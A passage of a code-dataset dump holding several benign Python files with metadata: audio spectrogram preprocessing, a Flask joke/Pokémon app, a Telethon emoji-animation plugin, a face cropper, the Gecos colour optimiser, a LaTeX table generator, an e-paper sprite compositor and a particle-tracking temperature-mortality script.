metafile, out_subdir='train', sample_rate=22050, n_fft=1024, win_length=None, \n hop_length=None, n_mels=80, mono=True, trim_db=None, decibel=True, normalize=True):\n meta = read_metadata(data_dir, metafile)\n out_dir = os.path.join(data_dir, out_subdir)\n process_wavfiles(meta, out_dir, sample_rate, trim_db, mono, n_fft, win_length, hop_length, n_mels, decibel, normalize)\n \n\n\n\ndef process_wavfiles(meta, out_dir, sample_rate=22050, trim_db=None, mono=True, n_fft=1024, win_length=None, hop_length=None, \n n_mels=80, decibel=True, normalize=True):\n if win_length is None:\n win_length = n_fft\n if hop_length is None:\n hop_length = int(win_length / 4)\n _spec_dir = 'spec'\n _mel_dir = 'mel'\n spec_dir = os.path.join(out_dir, _spec_dir)\n mel_dir = os.path.join(out_dir, _mel_dir)\n meta_path = os.path.join(out_dir, 'meta.txt')\n \n if not os.path.exists(out_dir):\n os.mkdir(out_dir)\n if not os.path.exists(spec_dir):\n os.mkdir(spec_dir)\n if not os.path.exists(mel_dir):\n os.mkdir(mel_dir)\n wav_paths = []\n spec_paths = []\n mel_paths = []\n _meta = []\n for fname, path, ntext in meta:\n wav_paths.append(path)\n 
spec_file = fname + '.spec.npy'\n        mel_file = fname + '.mel.npy'\n        spec_path = os.path.join(spec_dir, spec_file)\n        mel_path = os.path.join(mel_dir, mel_file)\n        spec_paths.append(spec_path)\n        mel_paths.append(mel_path)\n        _meta.append((fname, ntext, os.path.join(_spec_dir, spec_file), os.path.join(_mel_dir, mel_file)))\n\n    n_frames = audio_util.wav_to_spec_save_many(wav_paths, sample_rate, trim_db, mono, n_fft, win_length, hop_length, n_mels, \n                                                spec_paths, None, mel_paths, decibel, normalize)\n    with open(meta_path, 'w') as f:\n        for i, m in enumerate(_meta):\n            f.write(m[0] + '|' + m[1] + '|' + str(n_frames[i]) + '|' + m[2] + '|' + m[3] + '\\n')\n    \n    with open(os.path.join(out_dir, 'settings.txt'), 'w') as f:\n        f.write('sample_rate:' + str(sample_rate) + '\\n')\n        f.write('n_fft:' + str(n_fft) + '\\n')\n        f.write('win_length:' + str(win_length) + '\\n')\n        f.write('hop_length:' + str(hop_length) + '\\n')\n        f.write('n_mels:' + str(n_mels) + '\\n')\n        f.write('trim_db:' + str(trim_db) + '\\n')\n        f.write('mono:' + str(mono) + '\\n')\n        f.write('decibel:' + str(decibel) + '\\n')\n        f.write('normalize:' + str(normalize) + '\\n')","sub_path":"zeroth_korean/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":5082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"640375738","text":"from flask import Flask, render_template\nimport requests\nimport random\n\napp=Flask(__name__)\n\n\n@app.route(\"/\")\ndef chucknorris():\n\tresponse=requests.get('https://api.chucknorris.io/jokes/random')\n\tjson_response=response.json()\n\tjoke=json_response['value']\n\treturn render_template(\"index.html\",joke=joke,name=\"John\",gender=\"Male\")\n\n@app.route(\"/pokemon\")\ndef pokemon():\n\tresponse=requests.get('https://pokeapi.co/api/v2/pokemon-species/')\n\tjson_response=response.json()\n\tpokemon_names=[]\n\tnum=random.randint(0,17)\n\tfor i in range(num):\n\t\tpokemon_names.append((json_response[\"results\"][i][\"name\"],i+1))\n\treturn render_template(\"pokemon.html\",pokemon_names=pokemon_names)\n\n\nif __name__=='__main__':\n\tapp.run(debug=True)\n\n\n# Models for all types\n#\n","sub_path":"chucknorrispokemon/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"343829558","text":"\"\"\"COMMAND : .eye\"\"\"\n\nfrom telethon import events\n\nimport asyncio\n\n\n@borg.on(events.NewMessage(pattern=r\"\\.(.*)\", outgoing=True))\nasync def _(event):\n\n    if event.fwd_from:\n\n        return\n\n    animation_interval = 3\n\n    animation_ttl = range(0, 103)\n\n    input_str = event.pattern_match.group(1)\n\n    if input_str == \"eye\":\n\n        await event.edit(input_str)\n\n        animation_chars = [\n            \"👁👁\\n 👄 =====> Teehee\",\n            \"👁👁\\n 👅 =====> TicTac\",\n            \"👁👁\\n 💋 =====> Chee\",\n            \"👁👁\\n 👄 =====> Umm\",\n            \"👁👁\\n 👅 =====> Uhhhh\",\n            \"👁👁\\n 💋 =====> Uwuuuuuu\",\n            \"👁👁\\n 👄 =====> Yayyyyy\",\n            \"👁👁\\n 👅 =====> There you go\",\n            \"👁👁\\n 💋 =====> Nyaaa\",\n            \"👁👁\\n 👄 =====> Hi All, How Are You Guys...\"\n        ]\n\n        for i in animation_ttl:\n\n            await asyncio.sleep(animation_interval)\n\n            # index modulo the list length: the original i % 103 walked past the\n            # ten entries and raised an IndexError on the eleventh step\n            await event.edit(animation_chars[i % len(animation_chars)])\n","sub_path":"stdplugins/eye.py","file_name":"eye.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"449397839","text":"import argparse\nimport os.path as osp\nimport pickle\n\nfrom tqdm import tqdm\n\n
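# (added note) Cropper wraps this repo's RetinaFace-style face detector; its\n# find_face_batch method is assumed to return one set of detections per image.\n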
from face_cropper import Cropper\n\nimport torch\n\nfrom pck_dataset import PckDataset\n\ntorch.backends.cudnn.enabled = True\ntorch.backends.cudnn.benchmark = True\n\nparser = argparse.ArgumentParser(description='Retina face cropper')\n\nparser.add_argument('--pck-path', type=str, required=True)\nparser.add_argument('--network', type=str, required=False, default='mobile0.25')\nparser.add_argument('--weights', type=str, required=False, default='weights/mobilenet0.25_Final.pth')\nparser.add_argument('--batchsize', type=int, required=False, default=128)\nparser.add_argument('--num-workers', type=int, required=False, default=8)\nparser.add_argument('--dst-dim', type=int, required=False, default=512)\n\nargs = parser.parse_args()\ncropper = Cropper(network=args.network, weights_path=args.weights,\n                  im_height=args.dst_dim, im_width=args.dst_dim)\n\ndataset = PckDataset(args.pck_path, dst_dim=args.dst_dim)\ndataloader = torch.utils.data.DataLoader(dataset,\n                                         batch_size=args.batchsize,\n                                         num_workers=args.num_workers,\n                                         shuffle=False)\n\nresult = []\nfor batch in tqdm(dataloader):\n    img_tensor, meta = batch\n\n    img_tensor = img_tensor.to(0)\n\n    det = cropper.find_face_batch(img_tensor=img_tensor, orig_size=meta)\n    result.append(det)\n\nwith open('{}.crops.pck'.format(args.pck_path), 'wb') as f:\n    pickle.dump(result, f)\n","sub_path":"make_crops.py","file_name":"make_crops.py","file_ext":"py","file_size_in_byte":1520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"354956209","text":"import screen\nfrom survey import AnonymousSurvey\n\nscreen.clear()\n\n# Define a question, and make a survey.\nquestion = \"What language did you first learn to speak?\"\nmy_survey = AnonymousSurvey(question)\n\n# Show the question, and store responses to the question.\nmy_survey.show_question()\nprint(\"Enter 'q' at any time to quit.\\n\")\nwhile True:\n    response = input(\"Language: \")\n    if response == 'q':\n        break\n    my_survey.store_response(response)\n\n# Show the survey results.\nprint(\"\\nThank you to everyone who participated in the survey!\")\nmy_survey.show_results()\n","sub_path":"language_survey.py","file_name":"language_survey.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"347065463","text":"# This source code is part of the Gecos package and is distributed\n# under the 3-Clause BSD License. 
Please see 'LICENSE.rst' for further\n# information.\n\n__author__ = \"Patrick Kunzmann\"\n__all__ = [\"ColorOptimizer\", \"ScoreFunction\", \"DefaultScoreFunction\"]\n\nfrom collections import namedtuple\nimport abc\nimport copy\nimport numpy as np\nimport numpy.random as random\nimport biotite.sequence as seq\nimport biotite.sequence.align as align\nfrom .colors import lab_to_rgb\n\n\nMIN_L = 0\nMAX_L = 99\nMIN_AB = -128\nMAX_AB = 127\n\n\nclass ColorOptimizer(object):\n \"\"\"\n Create an optimizer that tries to find an optimal color conformation\n within a given color space based on a score function.\n\n The optimizer tries to minimize the return value of the score\n function by adjusting the *Lab* values (coordinates) for each\n symbol in a given alphabet.\n\n Parameters\n ----------\n alphabet : biotite.sequence.Alphabet\n The alphabet to calculate the color conformation for.\n score_function : ScoreFunction or callable\n The score function which should be minimized.\n When calling the object, its only parameter must be an array of\n coordinates with shape *(n, 3)*, where *n* is the length of the\n alphabet.\n Its return value must be a single float - the score.\n space : ColorSpace\n The color space that defines the allowed space for the\n coordinates.\n constraints : ndarray, shape=(n,3), dtype=float, optional\n An array whose non-NaN values are interpreted as constraints.\n Constrained values will be fixed during the optimization.\n \"\"\"\n\n class Result(namedtuple(\"Result\", [\"alphabet\", \"trajectory\", \"scores\"])):\n \"\"\"\n The result of an optimization.\n Contains the final color scheme information as well as the\n course of the coordinates and the score during the optimization.\n\n Parameters\n ----------\n alphabet : biotite.sequence.Alphabet\n The alphabet the optimizer used.\n trajectory : ndarray, shape=(m,n,3), dtype=float\n The course of the coordinates during the simulation.\n scores : ndarray, shape=(m,), dtype=float\n The course of the score during the simulation.\n\n Attributes\n ----------\n alphabet : biotite.sequence.Alphabet\n The alphabet the optimizer used.\n trajectory : ndarray, shape=(m,n,3), dtype=float\n The course of coordinates during the simulation.\n lab_colors : ndarray, shape=(n,3), dtype=float\n The final *Lab* color conformation, i.e. the last element of\n `trajectory`.\n rgb_colors : ndarray, shape=(n,3), dtype=float\n The final color conformation converted into *RGB* colors.\n scores : ndarray, shape=(m,), dtype=float\n The course of the score during the simulation.\n score : float\n The final score, i.e. 
the last element of `scores`.\n        \"\"\"\n        \n        @property\n        def score(self):\n            return self.scores[-1]\n\n        @property\n        def lab_colors(self):\n            return copy.deepcopy(self.trajectory[-1])\n        \n        @property\n        def rgb_colors(self):\n            return lab_to_rgb(self.lab_colors.astype(int))\n    \n    def __init__(self, alphabet, score_function, space, constraints=None):\n        self._alphabet = alphabet\n        self._n_symbols = len(alphabet)\n        self._score_func = score_function\n        self._space = space.space.copy()\n        self._coord = None\n        self._trajectory = []\n        self._scores = []\n\n        if constraints is None:\n            self._constraints = np.full((self._n_symbols, 3), np.nan)\n        else:\n            for constraint in constraints:\n                if not np.isnan(constraint).any() and \\\n                   not self._is_allowed(constraint):\n                    raise ValueError(\n                        f\"Constraint {constraint} is outside the allowed space\"\n                    )\n            self._constraints = constraints.copy()\n\n        ### Set initial conformation ###\n        # Every symbol has the 'l', 'a' and 'b' coordinates\n        # The coordinates are initially filled with values\n        # that are guaranteed to be invalid (l cannot be -1)\n        start_coord = np.full((self._n_symbols, 3), -1, dtype=float)\n        # Choose a start position from the allowed positions at random\n        for i in range(start_coord.shape[0]):\n            while not self._is_allowed(start_coord[i]):\n                drawn_coord = random.rand(3)\n                # map the uniform [0,1) samples onto the full Lab ranges; the\n                # former in-place '*=' arithmetic never shifted a/b below zero\n                drawn_coord[..., 0] = drawn_coord[..., 0] * (MAX_L - MIN_L) + MIN_L\n                drawn_coord[..., 1:] = drawn_coord[..., 1:] * (MAX_AB - MIN_AB) + MIN_AB\n                start_coord[i] = drawn_coord\n        self._apply_constraints(start_coord)\n        self._set_coordinates(start_coord)\n\n    def set_coordinates(self, coord):\n        \"\"\"\n        Set the coordinates of the current color conformation.\n        Potential color constraints are applied on these.\n        This coordinate change will be tracked in the trajectory.\n        \n        Parameters\n        ----------\n        coord : ndarray, shape=(n,3), dtype=float\n            The new coordinates.\n        \"\"\"\n        if coord.shape != (self._n_symbols, 3):\n            raise ValueError(\n                f\"Given shape is {coord.shape}, \"\n                f\"but expected shape is {(len(self._alphabet), 3)}\"\n            )\n        for c in coord:\n            if not self._is_allowed(c):\n                raise ValueError(\n                    f\"Coordinates {c} are outside the allowed space\"\n                )\n        coord = coord.copy()\n        self._apply_constraints(coord)\n        self._set_coordinates(coord)\n    \n    def _set_coordinates(self, coord, score=None):\n        self._coord = coord\n        self._trajectory.append(coord)\n        if score is None:\n            score = self._score_func(coord)\n        self._scores.append(score)\n    \n    def optimize(self, n_steps, temp, step_size):\n        \"\"\"\n        Perform a Metropolis-Monte-Carlo optimization on the current\n        coordinates.\n        This tries to minimize the score returned by the score function.\n        \n        Parameters\n        ----------\n        n_steps : int\n            The number of Monte-Carlo steps.\n        temp : float\n            The temperature of the optimization.\n            At higher temperatures, *score barriers* will be more likely\n            overcome, but the optimization will also less likely end in\n            a minimum.\n        step_size : float\n            The radius in which the coordinates are randomly altered in\n            each Monte-Carlo step.\n        \"\"\"\n        for i in range(n_steps):\n            score = self._scores[-1]\n            new_coord = self._move(self._coord, step_size)\n            new_score = self._score_func(new_coord)\n            if new_score < score:\n                self._set_coordinates(new_coord, new_score)\n            else:\n                # Metropolis criterion: accept the uphill move with\n                # probability exp(-(score difference) / temperature)\n                p = np.exp(-(new_score-score) / temp)\n                if p > random.rand():\n                    self._set_coordinates(new_coord, new_score)\n                else:\n                    # keep the old conformation and record its own score;\n                    # recording the rejected new_score would corrupt the trace\n                    self._set_coordinates(self._coord, score)\n\n    def get_result(self):\n        \"\"\"\n        Get the result of the optimization.\n\n        Returns\n        -------\n        result : ColorOptimizer.Result\n            The result.\n        \"\"\"\n
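        # (added) stack the recorded per-step (n, 3) coordinate arrays into a\n        # single (m, n, 3) trajectory array, m being the number of steps\n        trajectory 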
= np.array(self._trajectory)\n        return ColorOptimizer.Result(\n            alphabet = self._alphabet,\n            trajectory = trajectory,\n            scores = np.array(self._scores)\n        )\n    \n    def _is_allowed(self, coord):\n        if coord[0] < MIN_L or coord[0] > MAX_L or \\\n           coord[1] < MIN_AB or coord[1] > MAX_AB or \\\n           coord[2] < MIN_AB or coord[2] > MAX_AB:\n            return False\n        # Truncate the float coordinates to integers and shift them by the\n        # channel minima to index the precomputed boolean space grid\n        return self._space[\n            int(coord[0]) - MIN_L,\n            int(coord[1]) - MIN_AB,\n            int(coord[2]) - MIN_AB,\n        ]\n    \n    def _move(self, coord, step):\n        new_coord = coord + (random.rand(*coord.shape)-0.5) * 2 * step\n        self._apply_constraints(new_coord)\n        # Resample coordinates for alphabet symbols\n        # when outside of the allowed area\n        for i in range(new_coord.shape[0]):\n            while not self._is_allowed(new_coord[i]):\n                new_coord[i] = coord[i] + (random.rand(3)-0.5) * 2 * step\n        return new_coord\n    \n    def _apply_constraints(self, coord):\n        mask = ~(np.isnan(self._constraints).any(axis=-1))\n        coord[mask] = self._constraints[mask]\n\n\nclass ScoreFunction(metaclass=abc.ABCMeta):\n    \"\"\"\n    Abstract base class for a score function.\n    A score function calculates a score from a color conformation\n    (coordinates).\n\n    The score is calculated by calling the object with the coordinates\n    as its single argument.\n    Hence, classes inheriting from this base class must override the\n    :func:`__call__()` method.\n\n    Parameters\n    ----------\n    n_symbols : int\n        The number of symbols in the system.\n        Equivalent to the length of the alphabet the color scheme is\n        generated for.\n        This value is used to check the shape of the coordinates when\n        calling the score function.\n    \"\"\"\n\n    def __init__(self, n_symbols):\n        self._n_symbols = n_symbols\n\n    @abc.abstractmethod\n    def __call__(self, coord):\n        \"\"\"\n        Calculate the score for the given coordinates.\n\n        Parameters\n        ----------\n        coord : ndarray, shape=(n,3), dtype=float\n            The coordinates.\n        \n        Returns\n        -------\n        score : float\n            The score assigned to `coord`.\n        \"\"\"\n        if len(coord) != self._n_symbols:\n            raise ValueError(\n                f\"Expected {self._n_symbols} coordinates, but got {len(coord)}\"\n            )\n\n\nclass DefaultScoreFunction(ScoreFunction):\n    \"\"\"\n    Create an instance of the default score function *Gecos* uses.\n\n    The score function contains two terms:\n    a sum of harmonic potentials between each pair of symbols, based on\n    a substitution matrix, and a *contrast score* that favors schemes with\n    a high contrast.\n\n    Parameters\n    ----------\n    matrix : biotite.sequence.align.SubstitutionMatrix\n        A distance matrix is calculated from this score matrix.\n        The equilibrium positions scale linearly with the values in the\n        distance matrix.\n    contrast : int, optional\n        A weight for the *contrast score*.\n    \"\"\"\n\n    def __init__(self, matrix, contrast=500):\n        if not matrix.is_symmetric():\n            raise ValueError(\"Substitution matrix must be symmetric\")\n        super().__init__(len(matrix.get_alphabet1()))\n        self._matrix = self._calculate_distance_matrix(matrix)\n        self._n = DefaultScoreFunction._n_pairs(len(matrix.score_matrix()))\n        self._contrast = contrast\n    \n    def __call__(self, coord):\n        super().__call__(coord)\n        # pairwise Euclidean distances in Lab space via broadcasting\n        dist = np.sqrt(\n            np.sum(\n                (coord[:, np.newaxis, :] - coord[np.newaxis, :, :])**2, axis=-1\n            )\n        )\n        # keep only the lower triangle, i.e. one entry per unordered pair\n        dist = np.tril(dist)\n        dist_sum = np.sum(dist)\n        # This factor translates visual distances\n        # into substitution matrix distances\n
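        # (added) self._n is the number of symbol pairs, so dividing it by\n        # dist_sum rescales the mean pairwise distance to 1 in matrix units\n        scale_factor = self._n / 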
dist_sum\n        # Harmonic potentials between each pair of symbols\n        harmonic_score = np.sum((dist*scale_factor - self._matrix)**2)\n        # Contrast term: Favours conformations\n        # with large absolute color differences\n        mean_dist = dist_sum / DefaultScoreFunction._n_pairs(len(dist))\n        contrast_score = self._contrast / mean_dist\n        return harmonic_score + contrast_score\n    \n    @staticmethod\n    def _calculate_distance_matrix(similarity_matrix):\n        scores = similarity_matrix.score_matrix()\n        diff_to_max = np.diag(scores) - scores\n        distances = np.tril((diff_to_max + diff_to_max.T) / 2)\n        # Scale, so that average distance is 1\n        n = DefaultScoreFunction._n_pairs(len(scores))\n        distances /= (np.sum(distances) / n)\n        return distances\n    \n    @staticmethod\n    def _n_pairs(n_symbols):\n        \"\"\"\n        Calculate the number of values in the lower triangle,\n        excluding the main diagonal, of a\n        matrix with a shape *(n_symbols, n_symbols)*.\n        \"\"\"\n        return (n_symbols - 1) / 2 * n_symbols","sub_path":"src/gecos/optimizer.py","file_name":"optimizer.py","file_ext":"py","file_size_in_byte":12635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"243212968","text":"\"\"\"Script for generating heuristics results LaTeX figures.\"\"\"\n\n\n# Imports\nfrom experiments import (\n    headers,\n    TABLES_DIR,\n    RESULTS_DIR,\n    GROUND_TRUTH_DATA_FILE\n)\nfrom experiments.datasets import preprocessed\n\nfrom itertools import zip_longest\nimport pathlib\nimport pandas\nimport re\n\nEXACT_RESULTS_DATA_PATH = RESULTS_DIR / 'quantum_exact_results.csv'\n\nIC = 'ic'\nAI = 'vc'\nILP = 'ilp'\nILP1T = 'ilp_1t'\n\n\n# Constants\nSOLVER_ORDERING = [ILP, ILP1T, AI, IC]\nOUTPUT_DIR = TABLES_DIR / 'exact_tables'\nHEADERS = [\n    headers.BF_DATASET,\n    headers.LT_OPT,\n    'A-I',\n    r'$\\text{IC}^+_{2}$',\n    'ILP'\n]\n\n\ndef _rename_dataset(v):\n    return re.sub(\n        r'([a-zA-Z]+)_?([0-9]+)(?:_([0-9]+))?',\n        lambda m: m.group(1) + '-' + m.group(2) + (\n            '-' + m.group(3) if m.group(3) else ''\n        ),\n        v\n    ).replace('bqp', 'b')\n\n\ndef _get_metadata(dataset):\n    \"\"\"Read vertex and edge metadata from an edgelist dataset.\"\"\"\n    with open(dataset, 'r') as datafile:\n        return datafile.readline().strip().split(' ')\n\n\ndef dataset_sorter(r):\n\n    name = r[headers.DATASET]\n\n    # Choose how we want to order the datasets\n    ORDERING = {\"aa\": 0, \"j\": 1, \"bqp\": 2, \"gka\": 3}\n\n    # Head will be letters\n    head = name.rstrip(\"0123456789_\")\n\n    # Tail could be number or number_number\n    tail = name[len(head):].lstrip(\"_\")\n\n    # In either case, make tail a tuple of ints\n    if \"_\" in tail:\n        tail = list(map(int, tail.split(\"_\")))\n    else:\n        tail = int(tail)\n\n    # Return a tuple of ints as our comparison key\n    return (ORDERING[head], tail)\n\n\ndef main():\n    \"\"\"Load and print results.\"\"\"\n\n    # Read exact results\n    c = pandas.read_csv(EXACT_RESULTS_DATA_PATH)\n\n    # Pivot table\n    c = c.drop(columns=[headers.SIZE, headers.CERTIFICATE])\n    c = c.set_index([headers.DATASET])\n    c = c.pivot(columns=headers.SOLVER)\n    c = c.reorder_levels([1, 0], axis=1)\n    c.columns = [c[0] for c in c.columns.values]\n    c = c[SOLVER_ORDERING]\n    c = c.reset_index().fillna('-')\n\n    # Read metadata\n    gt = pandas.read_csv(str(GROUND_TRUTH_DATA_FILE))\n    gt = gt[[headers.DATASET, headers.SIZE]].rename(columns={\n        headers.SIZE: headers.OPT\n    })\n\n    # Merge in metadata\n    c = c.merge(gt, on=headers.DATASET)\n\n    # Get the individual subsets of records\n    first_half = preprocessed[:int(len(preprocessed)/2)]\n
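    # (added) the dataset list is split in half so the LaTeX table can show two\n    # dataset/solver column groups side by side (zipped together below)\n    second_half = 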
preprocessed[int(len(preprocessed)/2):]\n    left_table = c[c[headers.DATASET].isin(first_half)]\n    left_records = sorted(left_table.to_dict('records'), key=dataset_sorter)\n    right_table = c[c[headers.DATASET].isin(second_half)]\n    right_records = sorted(right_table.to_dict('records'), key=dataset_sorter)\n\n    # Zip them together so we can iterate\n    records = list(zip_longest(left_records, right_records))\n\n    def _format_record(r):\n\n        # If no record, just return empty columns\n        if not r:\n            return ' '.join(['&'] * (len(HEADERS) - 1))\n\n        # Otherwise render the dataset, optimum and per-solver columns\n        return (\n            r'\\texttt{{{dataset}}} & {opt} & {ai} & {ic} & {ilp}'\n            .format(\n                dataset=_rename_dataset(r.get(headers.DATASET, '')),\n                opt=r[headers.OPT],\n                ai=r[AI],\n                ic=r[IC],\n                ilp=r[ILP]\n            )\n        )\n\n    # Start list of lines in the output tex file\n    format_str = ''.join(['l'] + ['r'] * (len(HEADERS) - 1))\n    header_str = ' & '.join(HEADERS)\n    output_lines = [\n        r'\\begin{{tabular}}{{{fmt}p{{0.5in}}{fmt}}}'.format(fmt=format_str),\n        r'\\toprule',\n        r\"\"\" \\multicolumn{2}{c}{\\textbf{Graph}}\n            & \\multicolumn{3}{c}{\\textbf{Solver}}\n            &\n            & \\multicolumn{2}{c}{\\textbf{Graph}}\n            & \\multicolumn{3}{c}{\\textbf{Solver}} \\\\\"\"\".replace('\\n', ''),\n        r'\\cmidrule(lr){1-2}',\n        r'\\cmidrule(lr){3-5}',\n        r'\\cmidrule(lr){7-8}',\n        r'\\cmidrule(lr){9-11}',\n        header_str + ' & & ' + header_str + r' \\\\',\n        r'\\midrule',\n        *(\n            _format_record(t1) + ' & & ' + _format_record(t2) + r' \\\\'\n            for t1, t2 in records\n        ),\n        r'\\bottomrule',\n        r'\\end{tabular}'\n    ]\n\n    # Write output\n    pathlib.Path(OUTPUT_DIR).mkdir(parents=True, exist_ok=True)\n    output_filename = str(OUTPUT_DIR / 'quantum_exact.tex')\n    with open(output_filename, 'w') as output:\n        output.writelines(map(lambda l: l + '\\n', output_lines))\n\n\n# Invoke main\nif __name__ == '__main__':\n    main()\n    print(\"Wrote quantum_exact.tex\")\n","sub_path":"experiments/exact/quantum_plot.py","file_name":"quantum_plot.py","file_ext":"py","file_size_in_byte":4525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"631297550","text":"import uuid\n\nfrom PIL import Image\nfrom PIL import ImageOps\n\nfrom papirus import PapirusTextPos\nfrom papirus.sprite import Sprite\n\n\nWHITE = 1\nBLACK = 0\n\n\nclass RasterSprite(Sprite):\n    \"\"\"\n    A raster image (e.g. 
PNG, JPG, BMP) object to be drawn on screen\n    \"\"\"\n    def __init__(self, image, x, y, size):\n        super().__init__(x, y, size)\n        # store the prepared PIL image; update_sprite and draw_sprite_from_cache\n        # read .image, so the original .path attribute name was a misnomer\n        self.image = image\n\n\nclass PapirusComposite(PapirusTextPos):\n    def __init__(self, panel, auto_update=True):\n        super(PapirusComposite, self).__init__(panel, auto_update)\n        self.image_cache = dict()\n        self.image = Image.new('1', self.panel.size, WHITE)\n\n    def add_raster_sprite(self, file_path, x=0, y=0, size=(10, 10), sprite_id=None):\n        # Create a new Id if none is supplied\n        if sprite_id is None:\n            sprite_id = str(uuid.uuid4())\n\n        # load the file, convert to grayscale and dither down to 1-bit; the\n        # original confusingly reused the file_path name for the loaded image\n        image = Image.open(file_path)\n        image = ImageOps.grayscale(image)\n        image = image.resize(size)\n        image = image.convert(\"1\", dither=Image.FLOYDSTEINBERG)\n\n        # If the Id doesn't exist, add it to the dictionary\n        if sprite_id not in self.image_cache:\n            self.image_cache[sprite_id] = RasterSprite(image, x, y, size)\n        # add the sprite to the composite image\n        self.draw_sprite_from_cache(sprite_id)\n        # Automatically show?\n        if self.auto_update:\n            self.write_all()\n\n    def update_sprite(self, sprite_id, image):\n        # If the ID supplied is in the dictionary, update the image\n        # Currently ONLY the image is updated\n        if sprite_id in self.image_cache:\n            image = Image.open(image)\n            image = ImageOps.grayscale(image)\n            image = image.resize(self.image_cache[sprite_id].size)\n            image = image.convert(\"1\", dither=Image.FLOYDSTEINBERG)\n\n            self.image_cache[sprite_id].image = image\n\n            # Remove the old sprite from the composite image\n            self.erase_sprite_from_image(sprite_id)\n            # Add the new sprite to the composite image\n            self.draw_sprite_from_cache(sprite_id)\n            # Automatically show?\n            if self.auto_update:\n                self.write_all()\n\n    def remove_sprite(self, sprite_id):\n        # If the ID supplied is in the dictionary, remove it.\n        if sprite_id in self.image_cache:\n            self.erase_sprite_from_image(sprite_id)\n            del self.image_cache[sprite_id]\n\n            # Automatically show?\n            if self.auto_update:\n                self.write_all()\n\n    def erase_sprite_from_image(self, sprite_id):\n        # prepare for drawing\n        filler = Image.new('1', self.image_cache[sprite_id].size, WHITE)\n        # Draw a white rectangle over the top of the sprite to cover it\n        x = self.image_cache[sprite_id].x\n        y = self.image_cache[sprite_id].y\n        self.image.paste(filler, (x, y))\n\n    def draw_sprite_from_cache(self, sprite_id):\n        x = self.image_cache[sprite_id].x\n        y = self.image_cache[sprite_id].y\n\n        self.image.paste(self.image_cache[sprite_id].image, (x, y))\n","sub_path":"papirus/composite.py","file_name":"composite.py","file_ext":"py","file_size_in_byte":3120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"172511402","text":"\"\"\"\ntemp_mort.py takes the output dictionary from tracking experiments and applies\na mortality to the particles based on a minimum and/or maximum temperature.\n\nThe folder and filename to apply mortality to will be chosen in the run.\n\nOutput: Dictionary with the same shape as input, but with NaNs after\nparticles have stopped.\n\"\"\"\n\nimport pickle\nimport numpy as np\n\nimport os\nimport sys\nalp = os.path.abspath('../alpha')\nif alp not in sys.path:\n    sys.path.append(alp)\nimport Lfun\nLdir = Lfun.Lstart()\n\n# temperature minimum and maximum\ntemp_min = 10\ntemp_max = None\n\nindir = Ldir['LOo'] + 'tracks/'\n\n# choose the run directory\nprint('\\n%s\\n' % '** Choose file to apply mortality **')\nd_list_raw = os.listdir(indir)\nd_list = []\nfor d in d_list_raw:\n    d_list.append(d)\n
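# (added) count the run directories so they can be offered as a numbered menu\nNdt = 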
len(d_list)\nfor ndt in range(Ndt):\n    print(str(ndt) + ': ' + d_list[ndt])\nmy_ndt = int(input('-- Input number -- '))\ndirname = d_list[my_ndt] + '/'\n\n# create the list of run files\nm_list_raw = os.listdir(indir + dirname)\nm_list = []\nfor m in m_list_raw:\n    if m[-2:] == '.p' and 'mort' not in m:\n        m_list.append(m)\nNpt = len(m_list)\nfor npt in range(Npt):\n    print(str(npt) + ': ' + m_list[npt])\nmy_ndt = int(input('-- Input number (99 for all) -- '))\nif my_ndt == 99:\n    pass\nelse:\n    m_list = [m_list[my_ndt],]\n\n# loop through each file\nfor m_f in m_list:\n    fn = open(indir + dirname + m_f, 'rb')\n\n    # load dictionaries from file\n    P, G, S, Ldir = pickle.load(fn)\n    fn.close()\n\n    # remove values for mortality\n    NP = P['lon'].shape[1]\n    # create list of all possible days (assuming less than a year)\n    dt0 = P['ot'][0]\n    days = dt0 + np.arange(400)*86400\n    # go through each timestep\n    for ii in range(len(P['ot'])):\n        # each day, create a new mask\n        if P['ot'][ii] in days:\n            # build the mortality mask; \"is not None\" plus parenthesised\n            # comparisons fix the original \"!= None &\" precedence bug, which\n            # raised a TypeError before any mask was built\n            if temp_min is not None and temp_max is not None:\n                mort_mask = (P['temp'][ii,:] >= temp_min) & (P['temp'][ii,:] <= temp_max)\n            elif temp_min is not None:\n                mort_mask = P['temp'][ii,:] >= temp_min\n            elif temp_max is not None:\n                mort_mask = P['temp'][ii,:] <= temp_max\n            else:\n                raise ValueError('No Minimum or Maximum Temperature Assigned.')\n            # set all future values at the mask to nan\n            for var in P:\n                if var == 'ot':\n                    pass\n                elif var in ['lon', 'lat']:\n                    P[var][ii:,mort_mask] = P[var][ii, mort_mask]\n                else:\n                    P[var][ii:,mort_mask] = np.nan\n\n    # save the results (the min/max labels were swapped in the original name)\n    outname = (m_f[:-2] + '_temperature_min' + str(temp_min) + '_max' + str(temp_max) + '.p')\n\n    pickle.dump((P, G, S, Ldir), open(indir + dirname + outname, 'wb'))\n    print('Results saved to:\\n' + indir + dirname + outname)\n    print(50*'*')","sub_path":"tracker/temp_mort.py","file_name":"temp_mort.py","file_ext":"py","file_size_in_byte":2892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
